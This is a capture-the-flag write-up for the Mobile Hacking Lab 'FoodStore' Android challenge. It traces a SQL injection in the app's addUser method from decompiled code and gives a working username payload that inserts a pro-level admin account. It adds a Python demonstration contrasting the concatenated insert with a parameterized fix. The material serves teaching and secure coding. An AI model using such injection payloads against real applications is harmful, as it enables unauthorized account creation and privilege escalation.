Mobile Hacking Lab - Food Store

SQL Injection and Privilege Escalation: A Mobile Hacking Lab CTF Challenge

SQL injection remains one of the most consequential classes of application flaws. It exposes how an application builds the statements it sends to its database, and a single unescaped input can give an attacker the ability to read or modify data they should never be able to touch. The Mobile Hacking Lab challenge described here centres on such a flaw in an Android app and is a good exercise in finding and exploiting one from decompiled code.

The Challenge Overview

The challenge involves exploiting a SQL injection vulnerability in an Android app named “FoodStore” to upgrade a user’s status from regular to pro. This task requires advanced analysis and strategic thinking, going beyond basic exploitation techniques.

You can access the lab at Mobile Hacking Lab - FoodStore.

Technical Breakdown of the Vulnerable Method

The challenge starts with a close look at how the app works. I began by unpacking the APK with APKTool, then loaded it into jadx-gui to read the decompiled Java and work out how the app operates, paying particular attention to the sign-up feature.

This showed that the addUser and getUserByUsername methods are the app's two points of contact with its database: they handle how user records are written and read.

A closer look showed that addUser builds its SQL statement by concatenating user input directly into the query string, which is the classic precondition for SQL injection. getUserByUsername, which looks a user up by name, is the natural comparison: it shows how the same app reads back the data that addUser writes.

The Vulnerable addUser Method

This is the core of the SQL injection vulnerability: user input is concatenated straight into the SQL text. Whoever controls the username controls part of the statement, which opens the door to data tampering or, as here, privilege escalation.

String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";

Secure Coding Contrast: The getUserByUsername Method

This method shows the secure approach. The selection is the fixed string "username = ?" and the user-supplied value is passed separately as a selection argument, so SQLite binds it as data and never parses it as SQL. The contrast matters: the same app already knew how to do this correctly, and only addUser got it wrong.

Cursor cursor = db.query("users", new String[]{"id", "username", "password", "address", "isPro"}, "username = ?", new String[]{Username}, null, null, null);

The Exploitation Strategy

My goal was to exploit the vulnerability in addUser to escalate a user’s privilege. The intended exploit involved manipulating the isPro flag by injecting SQL through the username input field.

Exploitation Injection Vector

Initial exploit attempts focused on injecting an SQL segment through the username field in a format similar to:

'admin', 'encodedPassword', 'encodedAddress', 1); --

The idea is to close the original VALUES list early with isPro set to 1 and then comment out the rest of the statement. Note, though, that the query already wraps the username in single quotes, so with this leading quote the statement begins VALUES (''admin', ...), where '' is an empty string literal followed by a bare identifier, and SQLite rejects it with a syntax error. The working payload drops the leading quote.

Challenge in Exploitation

The successful injection, which effectively elevated a user’s privilege to that of a pro user within the application’s database, was crafted as follows:

admin','YWRtaW4=','YWRtaW4',1); --"

This payload was designed to exploit the SQL injection vulnerability within the addUser method. By inserting a crafted string into the username field, I was able to manipulate the SQL command executed by the application.

The payload closes the original INSERT INTO statement early with its own values, so the row that is actually written is the attacker's, with the pro flag set. The encoded values 'YWRtaW4=' and 'YWRtaW4' stand in for the Base64-encoded password and address (Base64 of admin is 'YWRtaW4='; the address value in the payload lacks the trailing '=' padding, which has no effect on the isPro flag), to respect the application's data handling conventions.

The inclusion of 1); --" at the end of the payload is where the money is. The 1 sets the isPro flag to true, granting pro status. The ); then closes the INSERT, and the -- comments out the remainder of the original statement (the app's own quoted password, address and isPro of 0), so the leftover text, stray quote included, can no longer break the query.

We can now log in as admin with the password admin (the injected 'YWRtaW4='), and the account has Pro User privileges!
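To make the whole chain concrete, here is an added example that is not part of the original write-up or the FoodStore app. It re-creates the vulnerable addUser and the parameterized getUserByUsername in Python against SQLite (the same engine Android uses), then runs both username payloads discussed above through the concatenated insert and the working payload through a parameterized insert. The users table schema, the encode helper and the login check are assumptions for the demonstration; the two payloads are those from the text.

```python
import base64
import sqlite3

# Constructed for this example: the two username payloads from the write-up.
# FIRST_ATTEMPT keeps a leading quote; PAYLOAD is the one that worked.
FIRST_ATTEMPT = "'admin', 'encodedPassword', 'encodedAddress', 1); --"
PAYLOAD = "admin','YWRtaW4=','YWRtaW4',1); --\""

COLUMNS = ("id", "username", "password", "address", "isPro")

# Assumed schema; the app's real CREATE TABLE is not shown in the write-up,
# only the column names used by addUser and getUserByUsername.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    username TEXT NOT NULL,
    password TEXT NOT NULL,
    address  TEXT NOT NULL,
    isPro    INTEGER NOT NULL DEFAULT 0
)
"""


def encode(value: str) -> str:
    """Base64-encode a field the way the app does for password and address."""
    return base64.b64encode(value.encode()).decode()


def fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db


def add_user_vulnerable(db, username, password, address) -> str:
    """Mirror of addUser: the username is concatenated into the SQL text, so
    whoever controls it controls the statement. Returns the SQL actually run."""
    sql = ("INSERT INTO users (username, password, address, isPro) VALUES ('"
           + username + "', '" + encode(password) + "', '" + encode(address) + "', 0)")
    db.execute(sql)
    db.commit()
    return sql


def add_user_safe(db, username, password, address) -> None:
    """Hardened addUser: values are bound through '?' placeholders, exactly as
    getUserByUsername already does, so they are stored verbatim, never parsed."""
    db.execute(
        "INSERT INTO users (username, password, address, isPro) VALUES (?, ?, ?, 0)",
        (username, encode(password), encode(address)),
    )
    db.commit()


def get_user_by_username(db, username):
    """Equivalent of the app's db.query(...) with a bound selection argument."""
    row = db.execute(
        "SELECT id, username, password, address, isPro FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    return None if row is None else dict(zip(COLUMNS, row))


def login(db, username, password):
    """Assumed login check: compare the stored (Base64) password."""
    user = get_user_by_username(db, username)
    if user is None or user["password"] != encode(password):
        return None
    return user


def outcome(insert, username):
    """Register `username` through `insert` on a fresh database and report the
    result: 'syntax error', or the isPro flag of the account admin/admin
    (None if no such account exists afterwards)."""
    db = fresh_db()
    try:
        insert(db, username, "whatever", "nowhere")
    except sqlite3.OperationalError:
        return "syntax error"
    user = login(db, "admin", "admin")  # 'YWRtaW4=' is Base64 for 'admin'
    return None if user is None else user["isPro"]


if __name__ == "__main__":
    print("first attempt, concatenated:", outcome(add_user_vulnerable, FIRST_ATTEMPT))
    print("working payload, concatenated:", outcome(add_user_vulnerable, PAYLOAD))
    print("working payload, parameterized:", outcome(add_user_safe, PAYLOAD))
```

Run as a script it reports a syntax error for the first attempt, isPro 1 for the working payload against the concatenated insert, and no admin account at all against the parameterized insert: with binding, the entire payload is stored as one literal username with isPro 0, and the trailing SQL never reaches the parser.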

Conclusion

Working through this SQL injection challenge was a lot of fun, and it is a clear illustration of how a single unsafe query can undermine a mobile app's security model. We traced the flaw from the decompiled code to a working payload that changes a user's status from regular to pro.

The challenge reaffirms that developers must use parameterized queries for every statement that carries user data (this app already did so in getUserByUsername; the fix for addUser is simply consistency), validate inputs on top of that rather than instead of it, and keep up with security best practices. For cybersecurity practitioners, it is a reminder that the read path being safe says nothing about the write path, and that every query in an app deserves the same scrutiny.